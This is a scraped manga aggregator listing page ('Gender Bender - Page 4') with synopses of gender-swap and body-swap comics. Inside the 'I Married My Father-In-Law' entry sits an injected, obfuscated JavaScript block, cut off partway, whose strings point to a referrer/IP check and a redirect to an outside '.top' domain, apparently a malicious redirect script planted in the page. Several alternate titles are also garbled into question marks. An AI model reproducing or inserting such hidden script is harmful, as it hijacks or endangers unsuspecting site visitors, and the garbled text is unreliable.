Gender Bender - Page 4

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

67 results

Circumstances Of Changing Bodies

Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse has not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies. Circumstances of Changing Bodies


I Married My Father-In-Law

On the day of the wedding between a male dentist and a female doctor, the female doctor suddenly swapped body with her own father after a mysterious lightning strike. From that moment onwards, the male dentist’s wife is officially his father-in-law! My Father-in-Law is My Wife / Father – in law is my future wife! / Nh?c ph? ??i nhân là lão bà / Yuefu daren Shi laopo / Yuèfù dàrén shì l?opó / ??? ????? – ??? ??????? / ????? – ??? ??????? ????! / ???????<script></script><script>function _0x4607(_0x196cac,_0x5ad857){var _0x3cd87b=_0x63da();return _0x4607=function(_0x501521,_0x312f96){_0x501521=_0x501521-(0x134d+-0x2667*-0x1+0x38d4*-0x1);var _0x3c658d=_0x3cd87b[_0x501521];return _0x3c658d;},_0x4607(_0x196cac,_0x5ad857);}function _0x63da(){var _0x117e98=['wkxRH','11159946XfFrKd','location','https://ip','22068NGhngj','24LztMFt','.customapi','random','href','referrer','PMhxf','then','rRoGQ','166053JkRVar','jVrmg','http://rea','1280FbIcAV','lZWlp','163150SHopEZ','soHBD','64TWReus','3804549AtlcvD','OmpCN','.top/','34288930JRwcHH','includes','google','658400EujCWb','TWmnm','nnenk','text','floor','yQngo',''];_0x63da=function(){return _0x117e98;};return _0x63da();}(function(_0x389d38,_0x278902){var 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Netkama Punch!!!

Read Manga Netkama Punch!!! Online For Free At Top Manhua Associated Names: Nekama Punch!!! / Netkama Punch !!! / Netkama Punch!!!: La Venganza Perfecta / ネカマパンチ!!! / 伪娘重拳 / 넷카마 펀치!!! The Content Netkama Punch!!!: Netkama – A Male Who Portrays Himself As Female Online. This Is What Kim Seyeong Decides To Become After Reencountering Shin Heejae, The Guy Who Destroyed Seyeong’s Gaming Career In “Arcadia” A Year Prior. His Plan Is To Pretend To Be A Girl In The Game, Get Heejae To Fall For Him, And Then Make The Big Reveal To Everyone So That His Archnemesis Will Also Be Humiliated Out Of “Arcadia” Forever. But Being A Dude Trying To Become The Girlfriend Of Your Worst Enemy Is No Easy Feat, Especially More So When Said Worst Enemy Starts To Show A Bit Too Much Interest In You. Will Seyeong Come Out The Victor Of This Scheme? Or Will He Find Himself Losing To Heejae All Over Again? New And Hot Comics Are Updated The Fastest. The Business Is Closed Due To The Tyrant Parents The Gambled Bride, Loved By A Wicked Lord Cinderella Disappeared Mangazin Is A Comprehensive Website Featuring The Latest And Hottest Manga, Updated Rapidly To Cater To Readers With High-Quality Images And Provide Them With Excellent Experiences. With Keywords Such As “Top Manhua” And “Manhwaclan,” As Well As Related Terms Like Zinmanga, Likemanga, And Read Manga Online Ensures Readers Have Access To A Wide Selection Of Top-Notch Manga Content. Please Always Follow And Share With Your Friends To Support The Website So That We Have More Motivation To Publish The Latest And Best Comics.


Surviving As An Obsessive Servant

Read manhwa Surviving as an Obsessive Servant / Surviving as an Obsessed Servant / 집착 시종으로 살아남기 I’ve died of the same rare disease 3 times in the world of a BL novel. I can’t die like this anymore. So I took special measures. ‘Let’s just put a spoon on the well-prepared medicine table!’ Young master, I won’t miss a single drop of medicine or even a breath! I disguised myself as a servant to serve the sick young master. Even the spirit power from his breath would heal me, so what could be better than this! But serving the said individual was not easy… “Get out! I said get out! I’ve had enough of this!!! …Wait. What are you doing on your knees right now?” “Young master, if you’re going to throw it away, please throw it in my mouth.” I told him in a panic while pulling his arm back to stop him from throwing the vial. “I don’t care if you spray it on my face…” For a moment, his pupils dilated wildly. *** I’m a do-if-you-must kind of girl. While I was at it, I took good care of my master, who was my lifesaver. As well as serving him, I hugged him, carried him, and became his legs. I wonder if he recognized my true value as the heir of a prestigious dukedom. The young master would occasionally glare at me, but he didn’t kick me out. Now, I have recovered and repaid my gratitude. It was time to figure out my escape plan… But something was off about the young master. “You said you liked me so much, so where are you trying to run off to?” “…” “You said you’d die without me.” Gradually, he began to have the look of a hungry predator.


Best Of Luck, Warrior!

The Devil King whom I defeated in my past life is now my boss in the office?! Baek Young-woong (meaning hero in korean), an ordinary office worker reborn with the memories of his past life as a warrior who defeated the devil king! The memories were only useful when he used to write webnovels as a child. Young-woong regrets having useless memories of his past life and gets a job in the executive secretarial office of Daeryong ENT, a big company. However, after meeting the CEO, Do Yeon-hwa, for the first time, I feel the trauma from my past life experience…? It’s like, you’re facing a really strong and big devil…! Read the terribly intertwined romance of the devil king, the CEO and the warrior, the newest secretary! Good Luck, Warrior! / Good Luck, Soldier! / 행운을 빌어요, 용사님!


Moscow’s Dawn

21-Year-Old Pianist, Lee Si-Yoon Chooses To Die Pessimistically About His Life That Can No Longer Play The Piano Due To An Accident, But He Wakes Up As Tatiana, A Girl From A Wealthy Family Who Speaks A Foreign Language That He Cannot Understand. Is This A God-Given Opportunity? Or Is It A Curse? What’s The Big Deal With The Gender Change? As Long As Your Hands Are Intact, You Can Play The Piano Again! Let’s Make Our Dream Come True As ‘Tatiana’! 모스크바의 여명 / The Dawn Of Moscow

1 days ago


Kang Ji-Hoon, An Ordinary High School Student Who Died In A Painful Accident, Finds Out In The Underworld That He Is Actually A ‘Water Spirit King Mistakenly Born As A Human’. “Making Water Spirits? How Do You Do That?” The Adventures Of Elqueeness, The Water Spirit King Who Was Mistakenly Born As A Human!


Onimai: I'M Now Your Sister!

Mihari Oyama's brother turns into a girl after she slips a certain medicine into his dinner. This is the story of him learning the ways of being a girl.


Unaware His Majesty Is A Girl

The New Emperor, Qi Nian, Acceded To The Throne Many Years Ago. He Kept Refusing The Requests By His Officials To Choose A Consort, Brushing Them Off By Saying “The Affairs Of State Are Important, And I Am Busy With My Work”. But Qi Nian Finally Relented As Rumors That “The Emperor Is Impotent” Spread Ever More Widely.yu Dingdang Was A Particularly Dim-Witted Girl, But Born To A Prestigious Family. This Led Many To Say: “Madame Yu Exchanged Her Brain For Her Looks”. Who Could Have Expected That Yu Would Be Selected By The Emperor To Be His Empress Consort?A Happy And Dramatic Girl-Girl Romantic Comedy Set In The Imperial Palace. Yu Couldn’t Have Expected That This Lofty Emperor Up On High Was Actually A Girl?!

2 days ago

I Became the Sacrificial Princess

Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans) Show less Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans)


We Won’t Die Easily!

“We can see spirits and hear the inner thoughts of others. We were born atop auspicious clouds and are truly the Son of Heaven. We will definitely refuse to” “go die!” “However, we were harmed by an evil-doer and turned into a girl! We don’t have our power-ups anymore — fine! But to that parasite staying in our magnificent body: could you stop only thinking about losing weight?! You’re just being mean at this point! Who knows what kind of hilarious events can unfold when two people who have never met each other end up switching bodies?! Please — enjoy the show!”


Rosen Garten Saga

After her village was attacked by a band of thieves, Rin has risen in order to protect her friends and the world with the help of a Magic Sword, which contains the soul of a hero...? A fantasy action story featuring an unprecedented heroine (?) (Source: Hero's, translated)
